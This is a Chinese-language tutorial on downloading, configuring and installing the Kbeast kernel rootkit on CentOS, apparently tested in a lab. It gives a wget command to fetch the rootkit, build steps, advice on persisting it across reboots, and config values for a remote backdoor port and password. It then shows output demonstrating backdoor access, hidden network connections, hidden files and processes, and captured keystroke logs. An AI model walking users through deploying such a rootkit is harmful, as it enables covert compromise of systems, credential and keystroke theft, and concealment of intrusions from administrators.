内核级rootkit Kbeast的安装与使用

下载地址:

http://core.ipsecs.com/rootkit/kernel-rootkit/kbeast-v1/

功能如下:

> Hiding this loadable kernel module
> Hiding files/directory
> Hiding process (ps, pstree, top, lsof)
> Hiding socket and connections (netstat, lsof)
> Keystroke logging to capture user activity
> Anti-kill process
> Anti-remove files
> Anti-delete this loadable kernel modules
> Local root escalation backdoor
> Remote binding backdoor hidden by the kernel rootkit

安装脚本支持的内核版本有2.6.16, 2.6.18, 2.6.32, and 2.6.35。
安装步骤如下:

> wget http://core.ipsecs.com/rootkit/kernel-rootkit/ipsecs-kbeast-v1.tar.gz
> tar zxvf ipsecs-kbeast-v1.tar.gz
> cd kbeast-v1/
> modify config.h to meet your requirement, remember that _MAGIC_NAME_
must be user with sh/bash shell
> In order to install in kernel 2.6.16 or 2.6.18, execute ./setup build 0
> In order to install in kernel 2.6.32 or 2.6.35, execute ./setup build
(actually it should work for the recent kernel)
> In order to install in kernel 2.6.9, edit .cc1 file to remove all sys_unlinkat()
related code, modify syscall table address manually, then execute ./setup build 0

需要注意的是重启后就会失效,所以需要加入开机启动中。

CentOS5.5下测试
测试机器内核:
yum install kernel kernel-devel gcc
1)安装


需要注意:
早配置文件config.h中#define _MAGIC_NAME_ “vincent”一定要是一个有/bin/bash的账户。

#define _H4X_PATH_ "/usr/_h4x_" 路径
#define _LOGFILE_ "acctlog" 键盘记录
#define _HIDE_PORT_ 13377 后门端口
#define _RPASSWORD_ "h4x3d" 后门密码

2)后门连接
使用nmap扫描,发现13377端口开放

[root@vincent ~]# nmap -p- 172.16.100.153

Starting Nmap 5.51 ( http://nmap.org ) at 2016-05-31 18:48 CST
Nmap scan report for 172.16.100.153
Host is up (0.000041s latency).
Not shown: 65531 closed ports
PORT STATE SERVICE
22/tcp open ssh
111/tcp open rpcbind
791/tcp open unknown
13377/tcp open unknown

直接使用telnet连接后门

123

3)连接隐藏
使用netstat查看,连接是隐藏的

[root@localhost usr]# netstat -ano | grep 13377
[root@localhost usr]#

4)文件隐藏
/usr/_h4x_是隐藏的,ll无法查看,可以cd到这个目录下

[root@localhost usr]# ll /usr/
总计 216
drwxr-xr-x 2 root root 49152 03-23 01:24 bin
drwxr-xr-x 2 root root 4096 2010-01-27 etc
drwxr-xr-x 2 root root 4096 2010-01-27 games
drwxr-xr-x 37 root root 4096 03-23 00:40 include
drwxr-xr-x 6 root root 4096 03-22 23:13 kerberos
drwxr-xr-x 67 root root 20480 03-23 01:24 lib
drwxr-xr-x 94 root root 40960 03-23 01:24 lib64
drwxr-xr-x 10 root root 4096 03-23 01:24 libexec
drwxr-xr-x 12 root root 4096 03-22 23:12 local
drwxr-xr-x 2 root root 16384 03-23 01:24 sbin
drwxr-xr-x 197 root root 4096 03-22 23:31 share
drwxr-xr-x 4 root root 4096 03-22 23:12 src
lrwxrwxrwx 1 root root 10 03-22 23:12 tmp -> ../var/tmp
drwxr-xr-x 3 root root 4096 03-22 23:12 X11R6
[root@localhost usr]# cd /usr/_h4x_
[root@localhost _h4x_]# ls
acctlog.0 config.h ipsecs-kbeast-v1.cc1 ipsecs-kbeast-v1.mod.o Makefile README.TXT
acctlog.500 init ipsecs-kbeast-v1.ko ipsecs-kbeast-v1.o Module.markers setup
bd-ipsecs-kbeast-v1.c ipsecs-kbeast-v1.c ipsecs-kbeast-v1.mod.c LICENSE Module.symvers

5)键盘记录

[root@localhost _h4x_]# cat acctlog.0
[30/03/2016-14:20:06] - [UID = 0 ] bash > ps aux
[30/03/2016-14:20:33] - [UID = 0 ] bash > [UP] | grep h4x
[30/03/2016-14:21:02] - [UID = 0 ] bash > ps xua | grep 3617
[30/03/2016-14:21:11] - [UID = 0 ] bash > ps -ef

6)进程隐藏
直接ps查看无法看到该进程,但是grep可以看到。

[root@localhost _h4x_]# ps xua | grep h4x
vincent 3617 0.0 0.1 66108 1584 ? Ss 15:20 0:00 ./_h4x_bd

将ps aux重定向到文件中,也可以看到。

[root@localhost _h4x_]# ps xua > /tmp/ps.txt
[root@localhost _h4x_]# cat /tmp/ps.txt | grep h4x
vincent 3617 0.0 0.1 66108 1584 ? Ss 15:20 0:00 ./_h4x_bd